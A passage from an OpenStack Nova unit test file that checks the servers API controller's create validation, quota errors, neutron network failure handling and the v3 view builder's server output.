self.stubs.Set(db, 'project_get_networks',
project_get_networks)
self.stubs.Set(db, 'instance_create', instance_create)
self.stubs.Set(db, 'instance_system_metadata_update',
fake_method)
self.stubs.Set(db, 'instance_get', instance_get)
self.stubs.Set(db, 'instance_update', instance_update)
self.stubs.Set(db, 'instance_update_and_get_original',
server_update_and_get_original)
self.stubs.Set(manager.VlanManager, 'allocate_fixed_ip',
fake_method)
self.body = {
'server': {
'name': 'server_test',
'imageRef': self.image_uuid,
'flavorRef': self.flavor_ref,
'metadata': {
'hello': 'world',
'open': 'stack',
},
},
}
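        # Legacy-style block device mapping fixture.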
self.bdm = [{'delete_on_termination': 1,
'device_name': 123,
'volume_size': 1,
'volume_id': '11111111-1111-1111-1111-111111111111'}]
self.req = fakes.HTTPRequest.blank('/fake/servers')
self.req.method = 'POST'
self.req.headers["content-type"] = "application/json"
def _check_admin_password_len(self, server_dict):
"""utility function - check server_dict for admin_password length."""
self.assertEqual(CONF.password_length,
len(server_dict["adminPass"]))
def _check_admin_password_missing(self, server_dict):
"""utility function - check server_dict for admin_password absence."""
self.assertNotIn("adminPass", server_dict)
def _test_create_instance(self, flavor=2):
image_uuid = 'c905cedb-7281-47e4-8a62-f26bc5fc4c77'
self.body['server']['imageRef'] = image_uuid
self.body['server']['flavorRef'] = flavor
self.req.body = jsonutils.dumps(self.body)
server = self.controller.create(self.req, body=self.body).obj['server']
self._check_admin_password_len(server)
self.assertEqual(FAKE_UUID, server['id'])
def test_create_instance_private_flavor(self):
values = {
'name': 'fake_name',
'memory_mb': 512,
'vcpus': 1,
'root_gb': 10,
'ephemeral_gb': 10,
'flavorid': '1324',
'swap': 0,
'rxtx_factor': 0.5,
'vcpu_weight': 1,
'disabled': False,
'is_public': False,
}
db.flavor_create(context.get_admin_context(), values)
self.assertRaises(webob.exc.HTTPBadRequest, self._test_create_instance,
flavor=1324)
def test_create_server_bad_image_href(self):
image_href = 1
self.body['server']['min_count'] = 1
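        # The trailing comma below makes imageRef a tuple, an invalid type.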
self.body['server']['imageRef'] = image_href,
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller.create,
self.req, body=self.body)
# TODO(cyeoh): bp-v3-api-unittests
# This needs to be ported to the os-networks extension tests
# def test_create_server_with_invalid_networks_parameter(self):
# self.ext_mgr.extensions = {'os-networks': 'fake'}
# image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
# flavor_ref = 'http://localhost/123/flavors/3'
# body = {
# 'server': {
# 'name': 'server_test',
# 'imageRef': image_href,
# 'flavorRef': flavor_ref,
# 'networks': {'uuid': '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'},
# }
# }
# req = fakes.HTTPRequest.blank('/v2/fake/servers')
# req.method = 'POST'
# req.body = jsonutils.dumps(body)
# req.headers["content-type"] = "application/json"
# self.assertRaises(webob.exc.HTTPBadRequest,
# self.controller.create,
# req,
# body)
def test_create_server_with_deleted_image(self):
# Get the fake image service so we can set the status to deleted
(image_service, image_id) = glance.get_remote_image_service(
context, '')
image_service.update(context, self.image_uuid, {'status': 'DELETED'})
self.addCleanup(image_service.update, context, self.image_uuid,
{'status': 'active'})
self.body['server']['flavorRef'] = 2
self.req.body = jsonutils.dumps(self.body)
with testtools.ExpectedException(
webob.exc.HTTPBadRequest,
'Image 76fa36fc-c930-4bf3-8c8a-ea2a2420deb6 is not active.'):
self.controller.create(self.req, body=self.body)
def test_create_server_image_too_large(self):
# Get the fake image service so we can set the status to deleted
(image_service, image_id) = glance.get_remote_image_service(
context, self.image_uuid)
image = image_service.show(context, image_id)
orig_size = image['size']
new_size = str(1000 * (1024 ** 3))
image_service.update(context, self.image_uuid, {'size': new_size})
self.addCleanup(image_service.update, context, self.image_uuid,
{'size': orig_size})
self.body['server']['flavorRef'] = 2
self.req.body = jsonutils.dumps(self.body)
with testtools.ExpectedException(
webob.exc.HTTPBadRequest,
"Flavor's disk is too small for requested image."):
self.controller.create(self.req, body=self.body)
def test_create_instance_image_ref_is_bookmark(self):
image_href = 'http://localhost/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.req.body = jsonutils.dumps(self.body)
res = self.controller.create(self.req, body=self.body).obj
server = res['server']
self.assertEqual(FAKE_UUID, server['id'])
def test_create_instance_image_ref_is_invalid(self):
image_uuid = 'this_is_not_a_valid_uuid'
image_href = 'http://localhost/images/%s' % image_uuid
flavor_ref = 'http://localhost/flavors/3'
self.body['server']['imageRef'] = image_href
self.body['server']['flavorRef'] = flavor_ref
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, body=self.body)
def test_create_instance_no_key_pair(self):
fakes.stub_out_key_pair_funcs(self.stubs, have_key_pair=False)
self._test_create_instance()
def _test_create_extra(self, params, no_image=False):
self.body['server']['flavorRef'] = 2
if no_image:
self.body['server'].pop('imageRef', None)
self.body['server'].update(params)
self.req.body = jsonutils.dumps(self.body)
self.req.headers["content-type"] = "application/json"
self.controller.create(self.req, body=self.body).obj['server']
# TODO(cyeoh): bp-v3-api-unittests
# This needs to be ported to the os-keypairs extension tests
# def test_create_instance_with_keypairs_enabled(self):
# self.ext_mgr.extensions = {'os-keypairs': 'fake'}
# key_name = 'green'
#
# params = {'key_name': key_name}
# old_create = compute_api.API.create
#
# # NOTE(sdague): key pair goes back to the database,
# # so we need to stub it out for tests
# def key_pair_get(context, user_id, name):
# return {'public_key': 'FAKE_KEY',
# 'fingerprint': 'FAKE_FINGERPRINT',
# 'name': name}
#
# def create(*args, **kwargs):
# self.assertEqual(kwargs['key_name'], key_name)
# return old_create(*args, **kwargs)
#
# self.stubs.Set(db, 'key_pair_get', key_pair_get)
# self.stubs.Set(compute_api.API, 'create', create)
# self._test_create_extra(params)
#
# TODO(cyeoh): bp-v3-api-unittests
# This needs to be ported to the os-networks extension tests
# def test_create_instance_with_networks_enabled(self):
# self.ext_mgr.extensions = {'os-networks': 'fake'}
# net_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
# requested_networks = [{'uuid': net_uuid}]
# params = {'networks': requested_networks}
# old_create = compute_api.API.create
# def create(*args, **kwargs):
# result = [('76fa36fc-c930-4bf3-8c8a-ea2a2420deb6', None)]
# self.assertEqual(kwargs['requested_networks'], result)
# return old_create(*args, **kwargs)
# self.stubs.Set(compute_api.API, 'create', create)
# self._test_create_extra(params)
def test_create_instance_with_port_with_no_fixed_ips(self):
port_id = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'port': port_id}]
params = {'networks': requested_networks}
def fake_create(*args, **kwargs):
raise exception.PortRequiresFixedIP(port_id=port_id)
self.stubs.Set(compute_api.API, 'create', fake_create)
self.assertRaises(webob.exc.HTTPBadRequest,
self._test_create_extra, params)
@mock.patch.object(compute_api.API, 'create')
def test_create_instance_raise_user_data_too_large(self, mock_create):
mock_create.side_effect = exception.InstanceUserDataTooLarge(
maxsize=1, length=2)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create,
self.req, body=self.body)
def test_create_instance_with_network_with_no_subnet(self):
network = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'uuid': network}]
params = {'networks': requested_networks}
def fake_create(*args, **kwargs):
raise exception.NetworkRequiresSubnet(network_uuid=network)
self.stubs.Set(compute_api.API, 'create', fake_create)
self.assertRaises(webob.exc.HTTPBadRequest,
self._test_create_extra, params)
def test_create_instance_with_non_unique_secgroup_name(self):
network = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'uuid': network}]
params = {'networks': requested_networks,
'security_groups': [{'name': 'dup'}, {'name': 'dup'}]}
def fake_create(*args, **kwargs):
raise exception.NoUniqueMatch("No Unique match found for ...")
self.stubs.Set(compute_api.API, 'create', fake_create)
self.assertRaises(webob.exc.HTTPConflict,
self._test_create_extra, params)
def test_create_instance_with_networks_disabled_neutronv2(self):
self.flags(network_api_class='nova.network.neutronv2.api.API')
net_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
requested_networks = [{'uuid': net_uuid}]
params = {'networks': requested_networks}
old_create = compute_api.API.create
def create(*args, **kwargs):
result = [('76fa36fc-c930-4bf3-8c8a-ea2a2420deb6', None,
None)]
self.assertEqual(result, kwargs['requested_networks'].as_tuples())
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self._test_create_extra(params)
def test_create_instance_with_networks_disabled(self):
net_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
requested_networks = [{'uuid': net_uuid}]
params = {'networks': requested_networks}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertIsNone(kwargs['requested_networks'])
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self._test_create_extra(params)
    def test_create_instance_with_pass_disabled(self):
        # Test with admin passwords disabled; see lp bug 921814.
        self.flags(enable_instance_password=False)
        # proper local hrefs must start with 'http://localhost/v3/'
image_href = 'http://localhost/v2/fake/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.req.body = jsonutils.dumps(self.body)
res = self.controller.create(self.req, body=self.body).obj
server = res['server']
self._check_admin_password_missing(server)
self.assertEqual(FAKE_UUID, server['id'])
def test_create_instance_name_too_long(self):
# proper local hrefs must start with 'http://localhost/v3/'
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['name'] = 'X' * 256
self.body['server']['imageRef'] = image_href
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError, self.controller.create,
self.req, body=self.body)
def test_create_instance_name_all_blank_spaces(self):
# proper local hrefs must start with 'http://localhost/v2/'
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
image_href = 'http://localhost/v3/images/%s' % image_uuid
flavor_ref = 'http://localhost/flavors/3'
body = {
'server': {
'name': ' ' * 64,
'imageRef': image_href,
'flavorRef': flavor_ref,
'metadata': {
'hello': 'world',
'open': 'stack',
},
},
}
req = fakes.HTTPRequest.blank('/v3/servers')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(exception.ValidationError,
self.controller.create, req, body=body)
def test_create_instance(self):
# proper local hrefs must start with 'http://localhost/v3/'
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.req.body = jsonutils.dumps(self.body)
res = self.controller.create(self.req, body=self.body).obj
server = res['server']
self._check_admin_password_len(server)
self.assertEqual(FAKE_UUID, server['id'])
def test_create_instance_extension_create_exception(self):
def fake_keypair_server_create(self, server_dict,
create_kwargs):
raise KeyError
self.stubs.Set(keypairs.Keypairs, 'server_create',
fake_keypair_server_create)
# proper local hrefs must start with 'http://localhost/v3/'
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
image_href = 'http://localhost/v3/images/%s' % image_uuid
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
'metadata': {
'hello': 'world',
'open': 'stack',
},
},
}
req = fakes.HTTPRequestV3.blank('/servers')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPInternalServerError,
self.controller.create, req, body=body)
def test_create_instance_pass_disabled(self):
self.flags(enable_instance_password=False)
# proper local hrefs must start with 'http://localhost/v3/'
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.req.body = jsonutils.dumps(self.body)
res = self.controller.create(self.req, body=self.body).obj
server = res['server']
self._check_admin_password_missing(server)
self.assertEqual(FAKE_UUID, server['id'])
def test_create_instance_too_much_metadata(self):
self.flags(quota_metadata_items=1)
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.body['server']['metadata']['vote'] = 'fiddletown'
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPForbidden,
self.controller.create, self.req, body=self.body)
def test_create_instance_metadata_key_too_long(self):
self.flags(quota_metadata_items=1)
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.body['server']['metadata'] = {('a' * 260): '12345'}
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller.create, self.req, body=self.body)
def test_create_instance_metadata_value_too_long(self):
self.flags(quota_metadata_items=1)
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.body['server']['metadata'] = {'key1': ('a' * 260)}
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller.create, self.req, body=self.body)
def test_create_instance_metadata_key_blank(self):
self.flags(quota_metadata_items=1)
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.body['server']['metadata'] = {'': 'abcd'}
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller.create, self.req, body=self.body)
def test_create_instance_metadata_not_dict(self):
self.flags(quota_metadata_items=1)
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.body['server']['metadata'] = 'string'
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller.create, self.req, body=self.body)
def test_create_instance_metadata_key_not_string(self):
self.flags(quota_metadata_items=1)
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.body['server']['metadata'] = {1: 'test'}
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller.create, self.req, body=self.body)
def test_create_instance_metadata_value_not_string(self):
self.flags(quota_metadata_items=1)
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.body['server']['metadata'] = {'test': ['a', 'list']}
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller.create, self.req, body=self.body)
def test_create_user_data_malformed_bad_request(self):
params = {'user_data': 'u1234'}
self.assertRaises(exception.ValidationError,
self._test_create_extra, params)
def test_create_instance_invalid_key_name(self):
image_href = 'http://localhost/v2/images/2'
self.body['server']['imageRef'] = image_href
self.body['server']['key_name'] = 'nonexistentkey'
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, self.req, body=self.body)
def test_create_instance_valid_key_name(self):
self.body['server']['key_name'] = 'key'
self.req.body = jsonutils.dumps(self.body)
res = self.controller.create(self.req, body=self.body).obj
self.assertEqual(FAKE_UUID, res["server"]["id"])
self._check_admin_password_len(res["server"])
def test_create_instance_invalid_flavor_href(self):
image_href = 'http://localhost/v2/images/2'
flavor_ref = 'http://localhost/v2/flavors/asdf'
self.body['server']['imageRef'] = image_href
self.body['server']['flavorRef'] = flavor_ref
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, self.req, body=self.body)
def test_create_instance_invalid_flavor_id_int(self):
image_href = 'http://localhost/v2/images/2'
flavor_ref = -1
self.body['server']['imageRef'] = image_href
self.body['server']['flavorRef'] = flavor_ref
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, self.req, body=self.body)
def test_create_instance_bad_flavor_href(self):
image_href = 'http://localhost/v2/images/2'
flavor_ref = 'http://localhost/v2/flavors/17'
self.body['server']['imageRef'] = image_href
self.body['server']['flavorRef'] = flavor_ref
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, self.req, body=self.body)
def test_create_instance_bad_href(self):
image_href = 'asdf'
self.body['server']['imageRef'] = image_href
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, self.req, body=self.body)
def test_create_instance_local_href(self):
self.req.body = jsonutils.dumps(self.body)
res = self.controller.create(self.req, body=self.body).obj
server = res['server']
self.assertEqual(FAKE_UUID, server['id'])
def test_create_instance_admin_password(self):
self.body['server']['flavorRef'] = 3
self.body['server']['adminPass'] = 'testpass'
self.req.body = jsonutils.dumps(self.body)
res = self.controller.create(self.req, body=self.body).obj
server = res['server']
self.assertEqual(server['adminPass'],
self.body['server']['adminPass'])
def test_create_instance_admin_password_pass_disabled(self):
self.flags(enable_instance_password=False)
self.body['server']['flavorRef'] = 3
self.body['server']['adminPass'] = 'testpass'
self.req.body = jsonutils.dumps(self.body)
res = self.controller.create(self.req, body=self.body).obj
self.assertIn('server', res)
self.assertIn('adminPass', self.body['server'])
def test_create_instance_admin_password_empty(self):
self.body['server']['flavorRef'] = 3
self.body['server']['adminPass'] = ''
self.req.body = jsonutils.dumps(self.body)
# The fact that the action doesn't raise is enough validation
self.controller.create(self.req, body=self.body)
def test_create_location(self):
selfhref = 'http://localhost/v2/fake/servers/%s' % FAKE_UUID
self.req.body = jsonutils.dumps(self.body)
robj = self.controller.create(self.req, body=self.body)
self.assertEqual(robj['Location'], selfhref)
def _do_test_create_instance_above_quota(self, resource, allowed, quota,
expected_msg):
fakes.stub_out_instance_quota(self.stubs, allowed, quota, resource)
self.body['server']['flavorRef'] = 3
self.req.body = jsonutils.dumps(self.body)
try:
self.controller.create(self.req, body=self.body).obj['server']
self.fail('expected quota to be exceeded')
except webob.exc.HTTPForbidden as e:
self.assertEqual(e.explanation, expected_msg)
def test_create_instance_above_quota_instances(self):
msg = _('Quota exceeded for instances: Requested 1, but'
' already used 10 of 10 instances')
self._do_test_create_instance_above_quota('instances', 0, 10, msg)
def test_create_instance_above_quota_ram(self):
msg = _('Quota exceeded for ram: Requested 4096, but'
' already used 8192 of 10240 ram')
self._do_test_create_instance_above_quota('ram', 2048, 10 * 1024, msg)
def test_create_instance_above_quota_cores(self):
msg = _('Quota exceeded for cores: Requested 2, but'
' already used 9 of 10 cores')
self._do_test_create_instance_above_quota('cores', 1, 10, msg)
def test_create_instance_with_neutronv2_port_in_use(self):
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'uuid': network, 'port': port}]
params = {'networks': requested_networks}
def fake_create(*args, **kwargs):
raise exception.PortInUse(port_id=port)
self.stubs.Set(compute_api.API, 'create', fake_create)
self.assertRaises(webob.exc.HTTPConflict,
self._test_create_extra, params)
@mock.patch.object(compute_api.API, 'create')
def test_create_instance_public_network_non_admin(self, mock_create):
public_network_uuid = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
params = {'networks': [{'uuid': public_network_uuid}]}
self.req.body = jsonutils.dumps(self.body)
mock_create.side_effect = exception.ExternalNetworkAttachForbidden(
network_uuid=public_network_uuid)
self.assertRaises(webob.exc.HTTPForbidden,
self._test_create_extra, params)
@mock.patch.object(compute_api.API, 'create')
def test_create_multiple_instance_with_specified_ip_neutronv2(self,
_api_mock):
_api_mock.side_effect = exception.InvalidFixedIpAndMaxCountRequest(
reason="")
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
address = '10.0.0.1'
requested_networks = [{'uuid': network, 'fixed_ip': address,
'port': port}]
params = {'networks': requested_networks}
self.body['server']['max_count'] = 2
self.assertRaises(webob.exc.HTTPBadRequest,
self._test_create_extra, params)
def test_create_multiple_instance_with_neutronv2_port(self):
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'uuid': network, 'port': port}]
params = {'networks': requested_networks}
self.body['server']['max_count'] = 2
def fake_create(*args, **kwargs):
msg = _("Unable to launch multiple instances with"
" a single configured port ID. Please launch your"
" instance one by one with different ports.")
raise exception.MultiplePortsNotApplicable(reason=msg)
self.stubs.Set(compute_api.API, 'create', fake_create)
self.assertRaises(webob.exc.HTTPBadRequest,
self._test_create_extra, params)
    def test_create_instance_with_neutronv2_not_found_network(self):
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
requested_networks = [{'uuid': network}]
params = {'networks': requested_networks}
def fake_create(*args, **kwargs):
raise exception.NetworkNotFound(network_id=network)
self.stubs.Set(compute_api.API, 'create', fake_create)
self.assertRaises(webob.exc.HTTPBadRequest,
self._test_create_extra, params)
def test_create_instance_with_neutronv2_port_not_found(self):
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'uuid': network, 'port': port}]
params = {'networks': requested_networks}
def fake_create(*args, **kwargs):
raise exception.PortNotFound(port_id=port)
self.stubs.Set(compute_api.API, 'create', fake_create)
self.assertRaises(webob.exc.HTTPBadRequest,
self._test_create_extra, params)
@mock.patch.object(compute_api.API, 'create')
def test_create_instance_with_network_ambiguous(self, mock_create):
mock_create.side_effect = exception.NetworkAmbiguous()
self.assertRaises(webob.exc.HTTPConflict,
self._test_create_extra, {})
class ServersControllerCreateTestWithMock(test.TestCase):
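    """Server create tests that mock out compute_api.API.create directly."""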
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
def setUp(self):
"""Shared implementation for tests below that create instance."""
super(ServersControllerCreateTestWithMock, self).setUp()
self.flags(verbose=True,
enable_instance_password=True)
self.instance_cache_num = 0
self.instance_cache_by_id = {}
self.instance_cache_by_uuid = {}
ext_info = plugins.LoadedExtensionInfo()
self.controller = servers.ServersController(extension_info=ext_info)
self.body = {
'server': {
'name': 'server_test',
'imageRef': self.image_uuid,
'flavorRef': self.flavor_ref,
'metadata': {
'hello': 'world',
'open': 'stack',
},
},
}
self.req = fakes.HTTPRequest.blank('/fake/servers')
self.req.method = 'POST'
self.req.headers["content-type"] = "application/json"
def _test_create_extra(self, params, no_image=False):
self.body['server']['flavorRef'] = 2
if no_image:
self.body['server'].pop('imageRef', None)
self.body['server'].update(params)
self.req.body = jsonutils.dumps(self.body)
self.req.headers["content-type"] = "application/json"
self.controller.create(self.req, body=self.body).obj['server']
@mock.patch.object(compute_api.API, 'create')
def test_create_instance_with_neutronv2_fixed_ip_already_in_use(self,
create_mock):
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
address = '10.0.2.3'
requested_networks = [{'uuid': network, 'fixed_ip': address}]
params = {'networks': requested_networks}
create_mock.side_effect = exception.FixedIpAlreadyInUse(
address=address,
instance_uuid=network)
self.assertRaises(webob.exc.HTTPBadRequest,
self._test_create_extra, params)
self.assertEqual(1, len(create_mock.call_args_list))
class ServersViewBuilderTest(test.TestCase):
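    """Tests for the v3 server view builder output."""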
def setUp(self):
super(ServersViewBuilderTest, self).setUp()
CONF.set_override('host', 'localhost', group='glance')
self.flags(use_ipv6=True)
db_inst = fakes.stub_instance(
id=1,
image_ref="5",
uuid="deadbeef-feed-edee-beef-d0ea7beefedd",
display_name="test_server",
include_fake_metadata=False)
privates = ['172.19.0.1']
publics = ['192.168.0.3']
public6s = ['b33f::fdee:ddff:fecc:bbaa']
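        # Fake network info: a 'public' network with v4/v6 addresses and a
        # 'private' network with a v4 address.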
def nw_info(*args, **kwargs):
return [(None, {'label': 'public',
'ips': [dict(ip=ip) for ip in publics],
'ip6s': [dict(ip=ip) for ip in public6s]}),
(None, {'label': 'private',
'ips': [dict(ip=ip) for ip in privates]})]
def floaters(*args, **kwargs):
return []
fakes.stub_out_nw_api_get_instance_nw_info(self.stubs, nw_info)
fakes.stub_out_nw_api_get_floating_ips_by_fixed_address(self.stubs,
floaters)
self.uuid = db_inst['uuid']
self.view_builder = views.servers.ViewBuilderV3()
self.request = fakes.HTTPRequestV3.blank("")
self.request.context = context.RequestContext('fake', 'fake')
self.instance = fake_instance.fake_instance_obj(
self.request.context,
expected_attrs=instance_obj.INSTANCE_DEFAULT_FIELDS,
**db_inst)
def test_get_flavor_valid_instance_type(self):
flavor_bookmark = "http://localhost/flavors/1"
expected = {"id": "1",
"links": [{"rel": "bookmark",
"href": flavor_bookmark}]}
result = self.view_builder._get_flavor(self.request, self.instance)
self.assertEqual(result, expected)
def test_build_server(self):
self_link = "http://localhost/v3/servers/%s" % self.uuid
bookmark_link = "http://localhost/servers/%s" % self.uuid
expected_server = {
"server": {
"id": self.uuid,
"name": "test_server",
"links": [
{
"rel": "self",
"href": self_link,
},
{
"rel": "bookmark",
"href": bookmark_link,
},
],
}
}
output = self.view_builder.basic(self.request, self.instance)
self.assertThat(output, matchers.DictMatches(expected_server))
def test_build_server_with_project_id(self):
expected_server = {
"server": {
"id": self.uuid,
"name": "test_server",
"links": [
{
"rel": "self",
"href": "http://localhost/v3/servers/%s" %
self.uuid,
},
{
"rel": "bookmark",
"href": "http://localhost/servers/%s" % self.uuid,
},
],
}
}
output = self.view_builder.basic(self.request, self.instance)
self.assertThat(output, matchers.DictMatches(expected_server))
def test_build_server_detail(self):
image_bookmark = "http://localhost/images/5"
flavor_bookmark = "http://localhost/flavors/1"
self_link = "http://localhost/v3/servers/%s" % self.uuid
bookmark_link = "http://localhost/servers/%s" % self.uuid
expected_server = {
"server": {
"id": self.uuid,
"user_id": "fake_user",
"tenant_id": "fake_project",
"updated": "2010-11-11T11:00:00Z",
"created": "2010-10-10T12:00:00Z",
"progress": 0,
"name": "test_server",
"status": "BUILD",
"hostId": '',
"image": {
"id": "5",
"links": [
{
"rel": "bookmark",
"href": image_bookmark,
},
],
},
"flavor": {
"id": "1",
"links": [
{
"rel": "bookmark",
"href": flavor_bookmark,
},
],
},
"addresses": {
'test1': [
{'version': 4, 'addr': '192.168.1.100',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
{'version': 6, 'addr': '2001:db8:0:1::1',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'}
]
},
"metadata": {},
"links": [
{
"rel": "self",
"href": self_link,
},
{
"rel": "bookmark",
"href": bookmark_link,
},
],
}
}
output = self.view_builder.show(self.request, self.instance)
self.assertThat(output, matchers.DictMatches(expected_server))
def test_build_server_detail_with_fault(self):
self.instance['vm_state'] = vm_states.ERROR
self.instance['fault'] = fake_instance.fake_fault_obj(
self.request.context, self.uuid)
image_bookmark = "http://localhost/images/5"
flavor_bookmark = "http://localhost/flavors/1"
self_link = "http://localhost/v3/servers/%s" % self.uuid
bookmark_link = "http://localhost/servers/%s" % self.uuid
expected_server = {
"server": {
"id": self.uuid,
"user_id": "fake_user",
"tenant_id": "fake_project",
"updated": "2010-11-11T11:00:00Z",
"created": "2010-10-10T12:00:00Z",
"name": "test_server",
"status": "ERROR",
"hostId": '',
"image": {
"id": "5",
"links": [
{
"rel": "bookmark",
"href": image_bookmark,
},
],
},
"flavor": {
"id": "1",
"links": [
{
"rel": "bookmark",
"href": flavor_bookmark,
},
],
},
"addresses": {
'test1': [
{'version': 4, 'addr': '192.168.1.100',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
{'version': 6, 'addr': '2001:db8:0:1::1',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'}
]
},
"metadata": {},
"links": [
{
"rel": "self",
"href": self_link,
},
{
"rel": "bookmark",
"href": bookmark_link,
},
],
"fault": {
"code": 404,
"created": "2010-10-10T12:00:00Z",
"message": "HTTPNotFound",
"details": "Stock details for test",
},
}
}
self.request.context = context.RequestContext('fake', 'fake')
output = self.view_builder.show(self.request, self.instance)
self.assertThat(output, matchers.DictMatches(expected_server))
def test_build_server_detail_with_fault_that_has_been_deleted(self):
self.instance['deleted'] = 1
self.instance['vm_state'] = vm_states.ERROR
fault = fake_instance.fake_fault_obj(self.request.context,
self.uuid, code=500,
message="No valid host was found")
self.instance['fault'] = fault
expected_fault = {"code": 500,
"created": "2010-10-10T12:00:00Z",
"message": "No valid host was found"}
self.request.context = context.RequestContext('fake', 'fake')
output = self.view_builder.show(self.request, self.instance)
        # Regardless of vm_state, deleted servers should be DELETED.
self.assertEqual("DELETED", output['server']['status'])
self.assertThat(output['server']['fault'],
matchers.DictMatches(expected_fault))
def test_build_server_detail_with_fault_no_details_not_admin(self):
self.instance['vm_state'] = vm_states.ERROR
self.instance['fault'] = fake_instance.fake_fault_obj(
self.request.context,
self.uuid,
code=500,
message='Error')
expected_fault = {"code": 500,
"created": "2010-10-10T12:00:00Z",
"message": "Error"}
self.request.context = context.RequestContext('fake', 'fake')
output = self.view_builder.show(self.request, self.instance)
self.assertThat(output['server']['fault'],
matchers.DictMatches(expected_fault))
def test_build_server_detail_with_fault_admin(self):
self.instance['vm_state'] = vm_states.ERROR
self.instance['fault'] = fake_instance.fake_fault_obj(
self.request.context,
self.uuid,
code=500,
message='Error')
expected_fault = {"code": 500,
"created": "2010-10-10T12:00:00Z",
"message": "Error",
'details': 'Stock details for test'}
self.request.environ['nova.context'].is_admin = True
output = self.view_builder.show(self.request, self.instance)
self.assertThat(output['server']['fault'],
matchers.DictMatches(expected_fault))
def test_build_server_detail_with_fault_no_details_admin(self):
self.instance['vm_state'] = vm_states.ERROR
self.instance['fault'] = fake_instance.fake_fault_obj(
self.request.context,
self.uuid,
code=500,
message='Error',
details='')
expected_fault = {"code": 500,
"created": "2010-10-10T12:00:00Z",
"message": "Error"}
self.request.environ['nova.context'].is_admin = True
output = self.view_builder.show(self.request, self.instance)
self.assertThat(output['server']['fault'],
matchers.DictMatches(expected_fault))
def test_build_server_detail_with_fault_but_active(self):
self.instance['vm_state'] = vm_states.ACTIVE
self.instance['progress'] = 100
self.instance['fault'] = fake_instance.fake_fault_obj(
